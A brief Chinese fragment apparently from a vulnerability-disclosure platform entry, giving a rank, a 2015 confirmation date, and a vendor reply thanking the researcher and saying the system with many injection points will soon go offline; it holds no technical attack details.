漏洞Rank:10

确认时间:2015-11-02 15:52

厂商回复:

感谢白帽子的辛苦劳动,此系统注入点很多,近期就会下线。

最新状态:

暂无


漏洞评价:

评论